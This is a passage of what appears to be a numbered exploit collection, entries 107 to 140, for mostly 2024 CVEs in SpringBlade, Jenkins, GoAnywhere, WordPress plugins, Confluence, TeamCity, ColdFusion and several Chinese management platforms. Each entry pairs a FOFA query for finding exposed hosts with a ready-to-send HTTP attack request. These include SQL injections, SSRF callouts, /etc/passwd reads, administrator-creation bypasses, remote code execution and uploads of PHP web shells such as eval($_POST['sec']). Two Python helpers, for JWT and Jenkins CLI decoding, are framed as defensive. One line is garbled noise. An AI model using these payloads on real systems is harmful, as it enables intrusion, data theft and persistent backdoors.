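    if start is None or "exp" not in claims:
        raise ValueError("token has no nbf/iat or no exp claim")
    return int(claims["exp"]) - int(start)


def assess(token: str, max_lifetime: int = 24 * 3600, now: float = None) -> dict:
    """Report what the token asserts and flag it if it is admin-scoped, long-lived or still valid."""
    parsed = parse_jwt_unverified(token)
    c = parsed["claims"]
    if now is None:
        now = datetime.now(timezone.utc).timestamp()
    lifetime = token_lifetime_seconds(c)
    findings = []
    if c.get("role_name") == "administrator" or c.get("account") == "admin":
        findings.append("admin-scoped token")
    if lifetime > max_lifetime:
        findings.append("lifetime %d s exceeds %d s" % (lifetime, max_lifetime))
    if c.get("nbf", 0) <= now < c.get("exp", 0):
        expires = datetime.fromtimestamp(c["exp"], timezone.utc).isoformat()
        findings.append("currently valid (expires %s)" % expires)
    return {
        "alg": parsed["header"].get("alg"),
        "account": c.get("account"),
        "role": c.get("role_name"),
        "lifetime_seconds": lifetime,
        "signature_bytes": len(parsed["signature"]),
        "findings": findings,
    }


if __name__ == "__main__":
    print(json.dumps(assess(POC_BLADE_AUTH), indent=2))
```

If your own SpringBlade deployment accepts this exact header value, the signing key is the one the PoC was minted with and has to be rotated; the claims alone show why the request needs no login: it is an administrator token with a multi-year validity window.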

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

The download side of the same session returns the command output:
POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response (the "@/etc/passwd" argument is expanded by args4j into the file's lines, which the help command then echoes back in its error text):
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
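Added example (mine, not from the page or the Jenkins project): an encoder and decoder for the framing used by the /cli?remoting=false upload body, written from the byte string in the PoC above. Each frame is a 4-byte big-endian payload length, a 1-byte opcode and the payload; ARG payloads are Java writeUTF strings (2-byte length prefix). The opcode names follow the order of Jenkins' PlainCLIProtocol.Op enum (ARG, LOCALE, ENCODING, START, ...). The decoder is what a responder would run over a captured upload body to recover the arguments and spot the "@file" ones that args4j expands; the encoder reproduces the PoC body byte for byte.

```python
import struct

# Opcodes of the Jenkins "plain" CLI protocol (hudson.cli.PlainCLIProtocol.Op), in ordinal order.
OPS = ["ARG", "LOCALE", "ENCODING", "START", "EXIT", "STDIN", "END_STDIN", "STDOUT", "STDERR"]
OP_CODE = {name: i for i, name in enumerate(OPS)}


def _java_utf(s: str) -> bytes:
    """DataOutputStream.writeUTF: 2-byte big-endian length, then the (modified) UTF-8 bytes.
    For the ASCII strings used here modified UTF-8 and UTF-8 are identical."""
    data = s.encode("utf-8")
    if len(data) > 0xFFFF:
        raise ValueError("string too long for writeUTF")
    return struct.pack(">H", len(data)) + data


def frame(op: str, payload: bytes = b"") -> bytes:
    """One frame: 4-byte big-endian payload length (excluding the opcode), 1-byte opcode, payload."""
    return struct.pack(">IB", len(payload), OP_CODE[op]) + payload


def encode_cli_request(args, encoding: str = "GBK", locale: str = "en_US") -> bytes:
    """Build the upload-side body the CLI client sends: ARG frames, then ENCODING, LOCALE and START."""
    body = b"".join(frame("ARG", _java_utf(a)) for a in args)
    body += frame("ENCODING", _java_utf(encoding))
    body += frame("LOCALE", _java_utf(locale))
    body += frame("START")
    return body


def decode_cli_frames(body: bytes):
    """Parse a captured upload body back into (opcode-name, payload) pairs; raises on truncation."""
    frames, pos = [], 0
    while pos < len(body):
        if pos + 5 > len(body):
            raise ValueError("truncated frame header at offset %d" % pos)
        length, code = struct.unpack(">IB", body[pos:pos + 5])
        pos += 5
        if pos + length > len(body):
            raise ValueError("truncated frame payload at offset %d" % pos)
        payload = body[pos:pos + length]
        pos += length
        name = OPS[code] if code < len(OPS) else "UNKNOWN(%d)" % code
        frames.append((name, payload))
    return frames


def cli_args(frames):
    """The command-line arguments carried in ARG frames (writeUTF length prefix stripped)."""
    return [p[2:].decode("utf-8") for name, p in frames if name == "ARG"]


def file_expansion_args(frames):
    """Arguments starting with '@': args4j replaces them with the named file's contents (CVE-2024-23897)."""
    return [a for a in cli_args(frames) if a.startswith("@")]


# Constructed sample: the exact body of the upload request in the PoC above.
POC_BODY = (b"\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd"
            b"\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03")

if __name__ == "__main__":
    parsed = decode_cli_frames(POC_BODY)
    for name, payload in parsed:
        print(name, payload)
    print("file-expansion arguments:", file_expansion_args(parsed))
```

Any upload body whose ARG frames contain an "@"-prefixed argument against an unpatched controller is an exploitation attempt regardless of the command name; on patched versions (2.442 / LTS 2.426.3 and later) the expansion is disabled.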

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

(The "..;/" segment bypasses the path check and reaches the initial account-setup wizard, from which an administrator account can be created.)

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: get the site's nonce value from the front page
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Affected versions: 7.9.11 - 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Byzoro Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php, the path given in txt_path.

119. Beijing Byzoro Smart S20 sysmanageajax.php SQL injection (authenticated)
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Byzoro Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

Uploaded file path: /upload/2.php

121. Beijing Byzoro Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

Uploaded file path: boot/web/upload/weblogo/1.php
9 ]6 }& z+ i1 e$ ^( R
122. Beijing Baichuo Smart (北京百绰智能) S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement in base64 encoding; decoded, it reads sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file: http://192.168.40.130:8282/Scripts/abcgcg.aspx
125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py
133. H5 Cloud Mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (福建科立迅) communications command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (福建科立讯) communications command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (福建科立讯) communications command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (福建科立讯) communications command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
